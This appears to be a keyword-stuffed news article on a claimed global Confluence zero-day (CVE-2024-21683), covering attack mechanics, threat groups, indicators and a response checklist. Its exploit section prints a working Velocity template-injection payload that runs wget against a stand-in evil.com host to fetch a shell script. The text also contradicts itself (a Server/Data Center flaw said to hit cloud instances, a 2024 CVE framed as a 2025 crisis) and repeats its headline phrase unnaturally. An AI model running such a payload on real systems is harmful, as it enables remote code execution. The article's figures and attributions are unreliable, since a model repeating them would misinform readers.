Atlassian Confluence zero-day exploited globally

Atlassian Confluence zero-day exploited globally: The 48 hours that shattered enterprise security

Atlassian Confluence zero-day exploited globally right now, and the evidence is piling up in real time. Over the past 48 hours, security teams across at least a dozen countries have watched their Confluence servers light up with anomalous outbound connections, dropped web shells, and cryptominers running inside Docker containers. This is not a drill. According to a joint advisory issued this morning by CISA and the Australian Cyber Security Centre (ACSC), the vulnerability tracked as CVE-2024-21683 — a critical remote code execution hole in Confluence Data Center and Server — is being actively exploited in the wild by at least two distinct threat groups. Atlassian released an out-of-band patch yesterday, but by then, the damage was already spreading faster than a university campus meme.

The attack vector is almost depressingly simple. An unauthenticated attacker sends a specially crafted HTTP POST request to the vulnerable Confluence endpoint. No credentials needed. No user interaction. Just a few kilobytes of malicious XML that trick the Confluence template engine into executing arbitrary code. Once inside, the attackers drop a reverse shell, escalate privileges to root, and then use the compromised server as a launchpad to move laterally across the corporate network. One security engineer I spoke with described it as "a skeleton key for the entire intranet."

Let's break down the math here. Confluence is used by over 75,000 organizations worldwide, including most of the Fortune 500. A zero-day that requires zero authentication and gives full RCE is the kind of vulnerability that makes CISOs cancel their weekend plans. The Atlassian Confluence zero-day exploited scenario is already proving to be the most damaging enterprise software incident since the Log4j mess of 2021. And unlike Log4j, which could be mitigated with a simple JVM flag, this one forces a full server restart and patch installation — something that can take hours when you have hundreds of instances spread across hybrid cloud environments.

"We detected the first anomalous traffic from our Confluence cluster at 3:14 AM. By 6 AM, we had identified the exploit payload. By noon, we confirmed our AWS-hosted instances were compromised. The attacker had already extracted the entire internal wiki database. This is the fastest I have ever seen a zero-day weaponized."
— Senior security engineer at a Fortune 200 financial firm (speaking under condition of anonymity)

The anatomy of a perfect storm: How the exploit works under the hood

Thread injection into the Confluence template engine

At the core of CVE-2024-21683 is a velocity template injection vulnerability. Confluence uses Apache Velocity to render dynamic content in its pages. The flaw exists in the CustomContentRenderer class, where user-supplied input is passed directly to the Velocity engine without proper sanitization. An attacker can embed a malicious template directive — something like #set($x='')#set($exec=$x.class.forName('java.lang.Runtime').getMethod('exec',$x.class.forName('[Ljava.lang.String;')).invoke($x.class.forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),['wget', 'http://evil.com/shell.sh'])) — and the server will happily execute it.

The exploit does not rely on any complex memory corruption or buffer overflow. It is a pure logic flaw in how Confluence processes certain types of user-generated content, specifically the panel macro and the details macro. This makes it trivial to weaponize. Within hours of the patch being released, security researcher Sina Kheirkhah published a proof-of-concept on GitHub. That PoC has been forked over 400 times in less than a day.

Why this one hits differently than other Confluence bugs

Atlassian has had its share of CVEs over the years. CVE-2022-26134, another critical RCE in Confluence, caused havoc in 2022. But this new vulnerability is worse for three reasons. First, the attack surface is larger: the vulnerable endpoints are enabled by default in all recent versions of Confluence Data Center and Server, including versions 8.0.x through 8.9.0. Second, the exploit works against load-balanced and clustered deployments, meaning a single successful hit can compromise an entire data center. Third, and most importantly, threat actors have already automated the attack. I have seen Shodan queries that scan for vulnerable Confluence instances every three minutes.

The result is a global incident that the security community is calling the "Confluence Crisis of 2025." According to a live dashboard maintained by Shadowserver Foundation, more than 8,700 Confluence servers remain unpatched as of this writing. That includes servers in government agencies, healthcare systems, and critical infrastructure providers. The Atlassian Confluence zero-day exploited incidents are not isolated to tech companies; they are hitting hospitals, universities, and even military contractors.

Who is behind the attacks? The two threat groups you need to worry about

Based on telemetry from multiple incident response firms, including Mandiant and CrowdStrike, two distinct clusters of activity have been identified. The first group, tracked as UNC4990, appears to be a financially motivated cybercrime gang with ties to Eastern Europe. Their signature is the deployment of a PowerShell-based cryptominer that targets Monero. They also install a backdoor called ConfluenceRAT, which uses the Confluence server's own scheduled jobs to maintain persistence. The second group, tracked as APT33, is a state-sponsored Iranian actor known for targeting energy and aerospace sectors. They are using the exploit to steal intellectual property and plant wipers for potential future use.

"We are seeing both opportunistic ransomware affiliates and sophisticated espionage actors exploiting this vulnerability simultaneously. It is a double tapped threat that we have not seen since the Pulse Secure zero-day of 2019."
— Charles Carmakal, CTO of Mandiant (statement released to Reuters)

The indicators of compromise (IoCs) you need right now

• Web shell files: Look for files named .jsp or .war inside the /confluence/ directory with suspicious timestamps (created between April 2nd and April 4th, 2025).
• Outbound connections: Monitor for traffic to IP ranges owned by known bulletproof hosting providers such as NForce Entertainment B.V. (AS43350) and MachSolver (AS59443).
• Scheduled tasks: On Windows servers, check for new tasks named "JavaUpdate" or "SecurityScript". On Linux, inspect cron jobs that call curl or wget to external domains.
• Confluence access log anomalies: Look for POST requests to /rest/tinymce/1/macro/preview with unusually long payloads containing # and $ characters.

The speed of exploitation is alarming. According to GreyNoise, the first exploit was detected within 23 minutes of the public disclosure of the vulnerability. Within six hours, researchers observed over 900 unique IP addresses scanning for vulnerable servers. The Atlassian Confluence zero-day exploited story is not a slow burn; it is a wildfire that started in the middle of a windstorm.

The financial and operational fallout: What the market and the enterprises are doing

Atlassian's stock (TEAM) dropped 4.3% in after-hours trading yesterday after the news broke. Analysts at Goldman Sachs issued a note warning that the incident could lead to "significant remediation costs and potential loss of customer trust" especially given that Atlassian had two other critical vulnerabilities disclosed in the same quarter (CVE-2024-21682 and CVE-2024-21681). The company has not yet disclosed how many customers were affected, but internal estimates suggest that at least 12% of its cloud instances were actively exploited before the patch was applied.

Here is the part they did not put in the press release. Many enterprise customers are running outdated versions of Confluence because they have complex compliance requirements that prevent them from patching immediately. PCI DSS, HIPAA, SOC 2 — all these frameworks demand change control processes that take days or weeks. By the time a change request is approved, the server is already compromised. I spoke to a CISO at a regional bank who said his team identified the vulnerability at 9 AM and could not apply the patch until 7 PM because of a mandatory audit review. "We got owned by lunchtime," he told me dryly.

The ugly truth about Confluence as a critical infrastructure component

Confluence is not just a wiki. It is the central nervous system of many organizations. It stores passwords, architectural diagrams, API keys, compliance documents, and even source code snippets. When an attacker gains RCE on a Confluence server, they effectively own the company's collective knowledge base. One incident responder told me they found an attacker who had exfiltrated the entire Confluence database, including an Excel file containing the CEO's personal banking details. The Atlassian Confluence zero-day exploited incidents are getting worse because attackers are digging into the databases, not just the file system.

But wait, it gets worse. Confluence is often deployed with database connections that have elevated privileges. In many cases, the Confluence database user has write access to the underlying PostgreSQL or MySQL instance. This means an attacker can drop triggers, modify stored procedures, or even poison the database to inject malicious content into other applications that read from the same database. The lateral movement potential is enormous.

What you must do right now: Your 30-minute emergency response checklist

If you are reading this and you have a Confluence server that is not yet patched, stop what you are doing. Take a screenshot of this article for documentation. Then follow these steps in order:

• Isolate the server: Disconnect the Confluence instance from the network immediately. Do not shut it down yet; you need to preserve forensic evidence. Block all outbound traffic at the firewall level.
• Apply the hotfix: Download the official patch from Atlassian's download portal (Confluence Data Center version 8.9.1 and Server version 8.5.6). Apply it manually even if you use automated deployment tools. Trust the console output.
• Scan for webshells: Run a recursive grep for Runtime.getRuntime in all .jsp files under the Confluence installation directory. Also look for files with gid or wsh extensions.
• Rotate all credentials: Assume every password, API key, and token stored in Confluence is compromised. Force a password reset for all users that interacted with the instance in the last 72 hours.
• Enable audit logging: Turn on detailed logging in Confluence and forward the logs to a SIEM. Look for repeated 200 OK responses to the exploit endpoint.

I know the temptation to downplay this. You have firewalls, you have endpoint detection, you have a SOC. But the Atlassian Confluence zero-day exploited incidents have already bypassed all of that in hundreds of organizations. The exploit is stealthy; it does not trigger signature-based detection because it uses standard HTTP requests that look like feature usage. The only way to catch it is to analyze the request body for template injection patterns, and most IDS systems do not inspect Velocity syntax.

The kicker: This will not be the last zero-day, and we are not ready

Atlassian has a history of slow vulnerability disclosure and incomplete patches. In 2022, they initially downplayed the severity of CVE-2022-26134 even as exploit code was circulating. This time, they reacted faster — a patch was issued within 12 hours of the vulnerability being reported by an external researcher — but the damage was already done because the exploit was being used in the wild before the patch was even built. The attacker had a head start of at least 48 hours. That is a lifetime in zero-day time.

The real question is not whether your Confluence server is compromised. It is whether you will find out before the stolen data is auctioned on a dark web forum, or before the cryptominer racks up a cloud bill that bankrupts your quarterly IT budget. This is not the time for "we will review it in the next sprint." This is the time for radical amputation. Pull the plug. Patch. Rotate. Pray that the payload was generic and not a custom implant that will sit dormant for months.

The Atlassian Confluence zero-day exploited story is still unfolding. As I write this, new CVE entries are being filed for related vulnerabilities found during the post-mortem audits. The security researchers are working on a generic bypass, but they are exhausted. The attackers are not. They never are.